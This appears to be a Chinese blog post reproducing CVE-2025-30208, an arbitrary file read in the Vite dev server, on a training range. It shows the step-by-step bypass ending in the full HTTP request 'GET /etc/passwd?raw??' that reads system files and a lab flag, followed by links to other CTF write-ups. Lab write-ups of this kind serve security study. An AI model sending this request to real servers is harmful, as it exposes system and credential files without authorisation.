CVE-2025-30208复现

靶场：玄机

Vite 任意文件读取漏洞

访问题目
.png
访问/etc/passwd 返回304
.png
后面加上?raw 回显403
.png
最后再加两个问号，访问/etc/passwd?raw??，成功任意文件读取
.png
请求体：

GET /etc/passwd?raw?? HTTP/1.1
Host: ip:port
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

读取flag
.png

Menu

Share

CVE-2025-30208复现

CVE-2025-30208复现

Comment

2024数字中国数据安全初赛竞赛wp

单片机开发项目(考试) 总共两大题其一

ssti-labs Flask框架靶场通关记录 1-13

2023 CISCN初赛 web unzip wp

使用kplayer推流，实现B站24小时直播

2024长城杯 WEB hash&what WP

2024"观安杯"ISG WP

2024西湖论剑 web1

2024 SICTF Round#3 WEB WP

2024 SICTF Round#3 Forensics WP